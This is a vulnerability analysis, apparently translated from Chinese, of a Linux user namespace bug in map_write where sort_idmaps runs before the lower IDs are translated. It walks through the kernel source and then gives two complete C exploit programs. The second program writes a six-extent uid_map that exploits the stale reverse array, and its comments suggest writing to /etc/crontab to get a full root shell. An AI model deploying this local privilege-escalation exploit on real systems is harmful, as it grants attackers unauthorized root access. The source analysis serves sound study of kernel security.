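Introduction
This is a vulnerability in Linux namespaces. The article first covers some basics of user namespaces, then starts from the patch and walks through the source code to find the root cause. Because I am not very familiar with this part of the source, the write-up concentrates on the source analysis; for everything else, see the links at the end.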
namespace
Linux implements namespaces to isolate different kinds of resources. The idea is to move what used to be global variables into per-namespace structures.
user namespaces
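The Linux man page for user namespaces: user_namespaces(7), "overview of Linux user namespaces".
User namespaces are the Linux namespaces that isolate security-related identifiers and attributes, mainly UIDs, GIDs, the root directory, keys, and capabilities. With a user namespace, a process can have different UIDs and GIDs inside and outside the namespace; for example, it can be root inside the namespace while being unprivileged on the real system.
The man page above describes two proc files: /proc/<pid>/uid_map and /proc/<pid>/gid_map. Writing to these files maps UIDs or GIDs of the system into the namespace. Each line has three fields:
- The first field, ID-inside-ns, is the UID or GID as seen inside the container.
- The second field, ID-outside-ns, is the real UID or GID outside the container that it maps to.
- The third field is the length of the mapped range. It is usually 1, meaning a one-to-one mapping.
For example, mapping the real uid=1000 to uid=0 inside the container: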
$ cat /proc/2465/uid_map
0 1000 1
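- The process writing these two files needs the CAP_SETUID (CAP_SETGID) capability in this namespace (see Capabilities).
- The writing process must be in this user namespace or in its parent user namespace.
- In addition, one of the following must hold: 1) the data written maps the writing process's effective UID/GID in the parent user namespace into the child user namespace; or 2) the writing process has CAP_SETUID/CAP_SETGID in the parent user namespace, in which case it may map any UID/GID of the parent namespace.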
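To make the three-field format concrete, here is a minimal user-space sketch that parses one map line and translates an ID from inside the namespace to outside. The names `id_extent`, `parse_map_line`, and `inside_to_outside` are made up for this illustration and are not kernel APIs; the kernel's own parser appears later in map_write.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* One line of /proc/<pid>/uid_map: "ID-inside-ns ID-outside-ns length". */
struct id_extent {
    uint32_t inside;   /* first ID as seen inside the namespace */
    uint32_t outside;  /* first ID it maps to outside the namespace */
    uint32_t length;   /* number of consecutive IDs covered */
};

/* Parse one map line; returns 0 on success, -1 on malformed input. */
int parse_map_line(const char *line, struct id_extent *out)
{
    uint32_t inside, outside, length;

    assert(line != NULL && out != NULL);
    if (sscanf(line, "%" SCNu32 " %" SCNu32 " %" SCNu32,
               &inside, &outside, &length) != 3)
        return -1;
    if (length == 0)    /* an empty range maps nothing */
        return -1;
    out->inside = inside;
    out->outside = outside;
    out->length = length;
    return 0;
}

/* Translate an in-namespace ID to the outside ID; -1 if it is not mapped. */
int64_t inside_to_outside(const struct id_extent *e, uint32_t id)
{
    assert(e != NULL);
    if (id < e->inside || id - e->inside >= e->length)
        return -1;
    return (int64_t)e->outside + (id - e->inside);
}
```

With the line "0 1000 1" from the example, ID 0 inside the namespace translates to 1000 outside, and ID 1 is unmapped.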
Patch analysis
The fix for this vulnerability is shown below. The problem is in map_write in kernel/user_namespace.c:
diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
index e5222b5..923414a 100644
--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
     if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
         goto out;
 
-    ret = sort_idmaps(&new_map);
-    if (ret < 0)
-        goto out;
-
     ret = -EPERM;
     /* Map the lower ids from the parent user namespace to the
      * kernel global id space.
@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
         e->lower_first = lower_first;
     }
 
+    /*
+     * If we want to use binary search for lookup, this clones the extent
+     * array and sorts both copies.
+     */
+    ret = sort_idmaps(&new_map);
+    if (ret < 0)
+        goto out;
+
     /* Install the map */
     if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
         memcpy(map->extent, new_map.extent,
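The patch only moves a few lines of code. Before drawing conclusions, let's analyze the function.
The call graph of this function, generated with Understand:
[Figure: call graph of map_write]
Next, look at proc_uid_map_write, one of the callers of map_write. Its prototype is: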
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos)
The parameters look like those of a file write handler. Searching the source for uses of this function shows that fs/proc/base.c has a structure that refers to proc_uid_map_write:
static const struct file_operations proc_uid_map_operations = {
    .open    = proc_uid_map_open,
    .write   = proc_uid_map_write,
    .read    = seq_read,
    .llseek  = seq_lseek,
    .release = proc_id_map_release,
};
This confirms that it is a file operation. The same file also contains the following line:
REG("uid_map", S_IRUGO|S_IWUSR, proc_uid_map_operations)
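So this is presumably the implementation of writes to /proc/<pid>/uid_map.
Source code analysis
Back to the vulnerable code. We start with proc_uid_map_write, the first function reached by a write to the file: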
ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
                           size_t size, loff_t *ppos)
{
    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct user_namespace *seq_ns = seq_user_ns(seq);

    if (!ns->parent)
        return -EPERM;

    if ((seq_ns != ns) && (seq_ns != ns->parent))
        return -EPERM;

    return map_write(file, buf, size, ppos, CAP_SETUID,
                     &ns->uid_map, &ns->parent->uid_map);
}
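It only performs two checks and then calls map_write. The last two arguments to map_write are the uid_map of the namespace and the uid_map of its parent namespace. (From the namespace basics we know that a new namespace is created by cloning a new process with specific flags.)
Looking at the definitions of these maps, uid_gid_extent matches the format of /proc/<pid>/uid_map and its sibling files exactly. The user_namespaces man page also notes that several lines can be written to these files at once: in Linux 4.14 and earlier the limit was (arbitrarily) set at 5 lines, and since Linux 4.15 it is 340 lines. That makes the two structures below easy to understand: with up to 5 lines, the extents are stored inline in extent; with more than 5, they are stored in the memory that forward points to: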
#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340
struct uid_gid_extent {
    u32 first;
    u32 lower_first;
    u32 count;
};

struct uid_gid_map { /* 64 bytes -- 1 cache line */
    u32 nr_extents;
    union {
        struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS];
        struct {
            struct uid_gid_extent *forward;
            struct uid_gid_extent *reverse;
        };
    };
};
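The first part of map_write is now fairly easy to follow. The capability checks can be read against the explanation in the man page. Apart from a few argument checks, the important piece is kbuf: memdup_user_nul allocates a block of kernel memory and copies the data written from user space into it, and kbuf ends up pointing to that block.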
    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct uid_gid_map new_map;
    unsigned idx;
    struct uid_gid_extent extent;
    char *kbuf = NULL, *pos, *next_line;
    ssize_t ret = -EINVAL;

    memset(&new_map, 0, sizeof(struct uid_gid_map));

    ret = -EPERM;
    /* Only allow one successful write to the map */
    if (map->nr_extents != 0)
        goto out;

    /*
     * Adjusting namespace settings requires capabilities on the target.
     */
    if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN))
        goto out;

    /* Only allow < page size writes at the beginning of the file */
    ret = -EINVAL;
    if ((*ppos != 0) || (count >= PAGE_SIZE))
        goto out;

    /* Slurp in the user data */
    /* Copy the data written from user space into kbuf */
    kbuf = memdup_user_nul(buf, count);
    if (IS_ERR(kbuf)) {
        ret = PTR_ERR(kbuf);
        kbuf = NULL;
        goto out;
    }

    /* Parse the user data */
    ret = -EINVAL;
    pos = kbuf;
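Next comes a large loop that parses the user input line by line into extent and then calls two key functions, mappings_overlap and insert_extent. mappings_overlap checks whether a uid_gid_extent overlaps anything already in the uid_gid_map and returns true if it does; insert_extent inserts a uid_gid_extent into the uid_gid_map.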
    for (; pos; pos = next_line) {

        /* Find the end of line and ensure I don't look past it */
        next_line = strchr(pos, '\n');
        if (next_line) {
            *next_line = '\0';
            next_line++;
            if (*next_line == '\0')
                next_line = NULL;
        }

        pos = skip_spaces(pos);
        extent.first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.lower_first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.count = simple_strtoul(pos, &pos, 10);
        if (*pos && !isspace(*pos))
            goto out;

        /* Verify there is not trailing junk on the line */
        pos = skip_spaces(pos);
        if (*pos != '\0')
            goto out;

        /* Verify we have been given valid starting values */
        if ((extent.first == (u32) -1) ||
            (extent.lower_first == (u32) -1))
            goto out;

        /* Verify count is not zero and does not cause the
         * extent to wrap
         */
        if ((extent.first + extent.count) <= extent.first)
            goto out;
        if ((extent.lower_first + extent.count) <=
             extent.lower_first)
            goto out;

        /* Do the ranges in extent overlap any previous extents? */
        if (mappings_overlap(&new_map, &extent))
            goto out;

        if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS &&
            (next_line != NULL))
            goto out;

        ret = insert_extent(&new_map, &extent);
        if (ret < 0)
            goto out;
        ret = -EINVAL;
    }
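Now for the implementation of these two functions. mappings_overlap walks the uid_gid_map, takes each existing uid_gid_extent, and compares it with the new extent, checking both the upper range (first) and the lower range (lower_first). Note that when nr_extents is greater than 5, the existing extents are read from the array that forward points to.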
static bool mappings_overlap(struct uid_gid_map *new_map,
                             struct uid_gid_extent *extent)
{
    u32 upper_first, lower_first, upper_last, lower_last;
    unsigned idx;

    upper_first = extent->first;
    lower_first = extent->lower_first;
    upper_last = upper_first + extent->count - 1;
    lower_last = lower_first + extent->count - 1;

    for (idx = 0; idx < new_map->nr_extents; idx++) {
        u32 prev_upper_first, prev_lower_first;
        u32 prev_upper_last, prev_lower_last;
        struct uid_gid_extent *prev;

        if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            prev = &new_map->extent[idx];
        else
            prev = &new_map->forward[idx];

        prev_upper_first = prev->first;
        prev_lower_first = prev->lower_first;
        prev_upper_last = prev_upper_first + prev->count - 1;
        prev_lower_last = prev_lower_first + prev->count - 1;

        /* Does the upper range intersect a previous extent? */
        if ((prev_upper_first <= upper_last) &&
            (prev_upper_last >= upper_first))
            return true;

        /* Does the lower range intersect a previous extent? */
        if ((prev_lower_first <= lower_last) &&
            (prev_lower_last >= lower_first))
            return true;
    }
    return false;
}
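The two comparisons in mappings_overlap are the standard test for whether two closed intervals intersect, applied once to the upper ranges and once to the lower ranges. The sketch below isolates that test in user space; `struct extent`, `ranges_intersect`, and `extents_overlap` are illustrative names, and the code assumes non-empty ranges that do not wrap, which map_write has already verified by this point.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

struct extent {
    uint32_t first;        /* start of the range inside the namespace */
    uint32_t lower_first;  /* start of the range in the parent namespace */
    uint32_t count;        /* length of both ranges */
};

/* True when the closed ranges [a_first, a_last] and [b_first, b_last] share an ID. */
bool ranges_intersect(uint32_t a_first, uint32_t a_last,
                      uint32_t b_first, uint32_t b_last)
{
    assert(a_first <= a_last && b_first <= b_last);
    return a_first <= b_last && a_last >= b_first;
}

/* True when a and b collide in the upper range or in the lower range. */
bool extents_overlap(const struct extent *a, const struct extent *b)
{
    assert(a->count > 0 && b->count > 0);
    return ranges_intersect(a->first, a->first + a->count - 1,
                            b->first, b->first + b->count - 1) ||
           ranges_intersect(a->lower_first, a->lower_first + a->count - 1,
                            b->lower_first, b->lower_first + b->count - 1);
}
```

Two extents are rejected as soon as either pair of ranges collides, so a map can never send two namespace IDs to the same parent ID or the other way round.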
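Next is insert_extent. It opens with one large if: when the number of stored extents reaches 5, meaning the inline array is full, it allocates memory for 340 extents, copies the existing entries into it, and points forward at the new array. The new extent is then copied into either the inline array or the forward array, and nr_extents is incremented.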
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent)
{
    struct uid_gid_extent *dest;

    if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) {
        struct uid_gid_extent *forward;

        /* Allocate memory for 340 mappings. */
        forward = kmalloc(sizeof(struct uid_gid_extent) *
                          UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL);
        if (!forward)
            return -ENOMEM;

        /* Copy over memory. Only set up memory for the forward pointer.
         * Defer the memory setup for the reverse pointer.
         */
        memcpy(forward, map->extent,
               map->nr_extents * sizeof(map->extent[0]));

        map->forward = forward;
        map->reverse = NULL;
    }

    if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS)
        dest = &map->extent[map->nr_extents];
    else
        dest = &map->forward[map->nr_extents];

    *dest = *extent;
    map->nr_extents++;
    return 0;
}
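Back in map_write: everything so far copies the input data and performs checks, and the parsed input ends up in new_map. We skip new_idmap_permitted, which can be understood by reading it against the capability rules for user namespaces. The next function is sort_idmaps: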
    if (new_map.nr_extents == 0)
        goto out;

    ret = -EPERM;
    /* Validate the user is allowed to use user id's mapped to. */
    if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
        goto out;

    ret = sort_idmaps(&new_map);
    if (ret < 0)
        goto out;
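sort_idmaps is a sorting function, and it only does anything when there are more than 5 extents. It sorts the forward array, then uses kmemdup to make a copy, sorts the copy in reverse-lookup order, and stores the result in reverse. As insert_extent above shows, reverse was initialized to NULL.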
static int sort_idmaps(struct uid_gid_map *map)
{
    if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        return 0;

    /* Sort forward array. */
    sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_forward, NULL);

    /* Only copy the memory from forward we actually need. */
    map->reverse = kmemdup(map->forward,
                           map->nr_extents * sizeof(struct uid_gid_extent),
                           GFP_KERNEL);
    if (!map->reverse)
        return -ENOMEM;

    /* Sort reverse array. */
    sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_reverse, NULL);

    return 0;
}
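The clone-and-sort step can be modelled in user space with qsort, as a rough sketch of what sort_idmaps does. The names `sort_both`, `cmp_first`, and `cmp_lower` are invented for this example, and malloc plus memcpy stands in for kmemdup. The point to notice is that the second array is an independent copy: later changes to one array are not visible in the other.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct extent {
    uint32_t first;
    uint32_t lower_first;
    uint32_t count;
};

/* Order by the in-namespace start, as the forward array is ordered. */
static int cmp_first(const void *a, const void *b)
{
    const struct extent *e1 = a, *e2 = b;
    return (e1->first > e2->first) - (e1->first < e2->first);
}

/* Order by the parent-side start, as the reverse array is ordered. */
static int cmp_lower(const void *a, const void *b)
{
    const struct extent *e1 = a, *e2 = b;
    return (e1->lower_first > e2->lower_first) -
           (e1->lower_first < e2->lower_first);
}

/*
 * Sort `forward` in place by first and return a separately allocated copy
 * sorted by lower_first. Returns NULL on allocation failure; the caller
 * frees the result.
 */
struct extent *sort_both(struct extent *forward, size_t n)
{
    struct extent *reverse;

    assert(forward != NULL && n > 0);
    qsort(forward, n, sizeof(*forward), cmp_first);

    reverse = malloc(n * sizeof(*reverse));
    if (!reverse)
        return NULL;
    memcpy(reverse, forward, n * sizeof(*reverse));
    qsort(reverse, n, sizeof(*reverse), cmp_lower);
    return reverse;
}
```

Keeping two sorted arrays lets both lookup directions use binary search, at the cost of having to keep the two copies consistent.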
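Back in map_write, the next step iterates over the parsed entries and calls map_id_range_down for each one. Its first argument is the parent namespace's uid_gid_map, which map_write received as a parameter. Its second and third arguments are the second and third fields of the written line, that is, the starting ID in the parent namespace and the length of the range.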
    /* Map the lower ids from the parent user namespace to the
     * kernel global id space.
     */
    for (idx = 0; idx < new_map.nr_extents; idx++) {
        struct uid_gid_extent *e;
        u32 lower_first;

        if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            e = &new_map.extent[idx];
        else
            e = &new_map.forward[idx];

        lower_first = map_id_range_down(parent_map,
                                        e->lower_first,
                                        e->count);

        /* Fail if we can not map the specified extent to
         * the kernel global id space.
         */
        if (lower_first == (u32) -1)
            goto out;

        e->lower_first = lower_first;
    }
Next, map_id_range_down:
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count)
{
    struct uid_gid_extent *extent;
    unsigned extents = map->nr_extents;
    smp_rmb();

    if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        extent = map_id_range_down_base(extents, map, id, count);
    else
        extent = map_id_range_down_max(extents, map, id, count);

    /* Map the id or note failure */
    if (extent)
        id = (id - extent->first) + extent->lower_first;
    else
        id = (u32) -1;

    return id;
}
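When the parent map has more than 5 extents, this calls map_id_range_down_max, a thin wrapper around binary search. Recall the user input: the second field is the start of the range in the parent namespace. The function binary-searches the parent namespace's map for a uid_gid_extent whose [first, first+count-1] contains the range that the child namespace wants to map.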
/**
 * map_id_range_down_max - Find idmap via binary search in ordered idmap array.
 * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS.
 */
static struct uid_gid_extent *
map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count)
{
    struct idmap_key key;

    key.map_up = false;
    key.count = count;
    key.id = id;

    return bsearch(&key, map->forward, extents,
                   sizeof(struct uid_gid_extent), cmp_map_id);
}
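Back in map_id_range_down: once the extent is found, it is used to update id, which is then returned. Looking back at the caller, this id is the lower_first field of the child namespace's uid_gid_extent, that is, the starting ID in the parent namespace. The statement below rewrites id from the parent namespace's ID space into whatever the parent's own map points at. The parent's lower_first was translated the same way when the parent's map was written, and every namespace is nested step by step under a single root namespace, so the resulting value is the UID in the kernel's global ID space.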
id = (id - extent->first) + extent->lower_first;
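As a worked example of this translation, the sketch below looks up a requested range in a parent map and applies the same formula. It is a simplified user-space model: `range_down` and `ID_INVALID` are hypothetical names, and a linear scan replaces the kernel's bsearch since the lookup strategy does not change the result.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ID_INVALID ((uint32_t)-1)

struct extent {
    uint32_t first;        /* start of the range in the parent namespace */
    uint32_t lower_first;  /* start of the range in kernel global ID space */
    uint32_t count;
};

/*
 * Translate the start of [id, id + count - 1] through the parent map.
 * The whole range must fit inside a single parent extent, otherwise
 * the result is ID_INVALID.
 */
uint32_t range_down(const struct extent *parent, size_t n,
                    uint32_t id, uint32_t count)
{
    uint32_t last;

    assert(parent != NULL && count > 0);
    last = id + count - 1;
    for (size_t i = 0; i < n; i++) {
        uint32_t first = parent[i].first;
        uint32_t ext_last = first + parent[i].count - 1;

        if (first <= id && last <= ext_last)
            return (id - first) + parent[i].lower_first;
    }
    return ID_INVALID;
}
```

If the parent map is "0 100000 1000", a child line "5 5 995" has its lower_first translated from 5 to (5 - 0) + 100000 = 100005, while a request for 996 IDs starting at 5 fails because it runs past the end of the parent's range.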
Finally, back in map_write, the end of the for loop uses the following statement to update the lower_first field of the corresponding uid_gid_extent in new_map:
e->lower_first = lower_first;
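One last part of map_write remains, and it works like a write-back. map_write takes a parameter named map, which proc_uid_map_write shows to be the uid_gid_map of the current namespace, while new_map is freshly built. This part installs new_map into map (the proc file can only be written once and is empty initially). The function ends with some error handling.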
    /* Install the map */
    if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
        memcpy(map->extent, new_map.extent,
               new_map.nr_extents * sizeof(new_map.extent[0]));
    } else {
        map->forward = new_map.forward;
        map->reverse = new_map.reverse;
    }
    smp_wmb();
    map->nr_extents = new_map.nr_extents;

    *ppos = count;
    ret = count;
out:
    if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) {
        kfree(new_map.forward);
        kfree(new_map.reverse);
        map->forward = NULL;
        map->reverse = NULL;
        map->nr_extents = 0;
    }

    mutex_unlock(&userns_state_mutex);
    kfree(kbuf);
    return ret;
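Vulnerability analysis
In sort_idmaps above, when there are more than 5 entries, a copy named reverse is created and sorted. It is never modified afterwards, and its address is finally assigned to map.
Here is how the two sort orders differ: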
static int cmp_extents_forward(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->first < e2->first)
        return -1;

    if (e1->first > e2->first)
        return 1;

    return 0;
}

/* cmp function to sort() reverse mappings */
static int cmp_extents_reverse(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->lower_first < e2->lower_first)
        return -1;

    if (e1->lower_first > e2->lower_first)
        return 1;

    return 0;
}
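forward is sorted by the first field of each uid_gid_extent in the uid_gid_map, while reverse is sorted by the lower_first field.
In the for loop that calls map_id_range_down, e->lower_first is updated, and e is obtained through forward. So only the values in forward are updated; reverse was cloned before that loop ran and still holds the values exactly as the user wrote them. Suppose a namespace n1 maps its root to an unprivileged kernel UID, and n1 then creates a namespace n2 whose map sends n2's root to n1's root. In n2's uid_map, the second field (lower_first) of the extents that forward points to is rewritten to the kernel UID, but the extents that reverse points to are not: they still describe a root-to-root mapping. Any UID check that goes through reverse can therefore lead to privilege escalation.
The remaining question is where the reverse array is actually used, and what for.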
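The effect of the ordering can be reproduced in a small user-space model. This is only a sketch under simplifying assumptions: `install_map`, `map_down`, `map_up`, and `UNMAPPED` are illustrative names, lookups are linear, only the start of each range is translated, and the sort is left out because the sample input is already ordered on both keys. The `buggy` flag selects whether the reverse copy is taken before the translation loop (pre-patch order) or after it (patched order).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define UNMAPPED ((uint32_t)-1)

struct extent {
    uint32_t first;
    uint32_t lower_first;
    uint32_t count;
};

/* Namespace ID -> lower ID, matching on the `first` range. */
uint32_t map_down(const struct extent *fwd, size_t n, uint32_t id)
{
    for (size_t i = 0; i < n; i++)
        if (id >= fwd[i].first && id - fwd[i].first < fwd[i].count)
            return fwd[i].lower_first + (id - fwd[i].first);
    return UNMAPPED;
}

/* Lower ID -> namespace ID, matching on the `lower_first` range. */
uint32_t map_up(const struct extent *rev, size_t n, uint32_t id)
{
    for (size_t i = 0; i < n; i++)
        if (id >= rev[i].lower_first && id - rev[i].lower_first < rev[i].count)
            return rev[i].first + (id - rev[i].lower_first);
    return UNMAPPED;
}

/*
 * Model of the tail of map_write(): translate each lower_first in
 * `forward` through the parent map and produce the `reverse` copy.
 */
void install_map(bool buggy, const struct extent *parent, size_t parent_n,
                 struct extent *forward, struct extent *reverse, size_t n)
{
    assert(parent != NULL && forward != NULL && reverse != NULL);

    if (buggy)  /* pre-patch: clone before the translation loop */
        memcpy(reverse, forward, n * sizeof(*forward));

    for (size_t i = 0; i < n; i++)
        forward[i].lower_first =
            map_down(parent, parent_n, forward[i].lower_first);

    if (!buggy) /* patched: clone after the translation loop */
        memcpy(reverse, forward, n * sizeof(*forward));
}
```

Take n1's map as "0 100000 1000" and the six lines "0 0 1", "1 1 1", "2 2 1", "3 3 1", "4 4 1", "5 5 995" for n2. In both orders the forward lookup sends n2's UID 0 to kernel UID 100000. With the pre-patch order, the reverse lookup also reports kernel UID 0 as mapped to n2's UID 0, which is the stale root-to-root entry; with the patched order kernel UID 0 is unmapped and kernel UID 100000 maps back to 0.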
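According to the author's write-up and the references to reverse in the user namespace code, the array is used directly on the from_kuid() path. kuid_has_mapping() relies on from_kuid() to decide whether a kernel UID is mapped, and kuid_has_mapping() is in turn used by permission checks such as inode_owner_or_capable() and privileged_wrt_inode_uidgid().
Exploit code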
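Finally, here is the exploit code. The first part is subuid_shell.c, which uses an ordinary unshare call to create a new user namespace. The main flow is:
1. The parent forks a child. The child calls unshare to create a new user namespace while the parent waits.
2. After creating the namespace, the child waits while the parent writes uid_map and the related files to set up the mapping.
3. The parent waits while the child executes a shell.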
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");

    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    char cmd[1000];
    sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}
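Next is subshell.c. The flow is the same as above; only the mapping data written for the child differs. The vulnerability analysis section explains why these particular values are used.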
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");

    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // directory that holds the child's uid_map and gid_map
    char pbuf[100];
    sprintf(pbuf, "/proc/%d", (int)child);

    // cd to /proc/<pid>
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);

    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}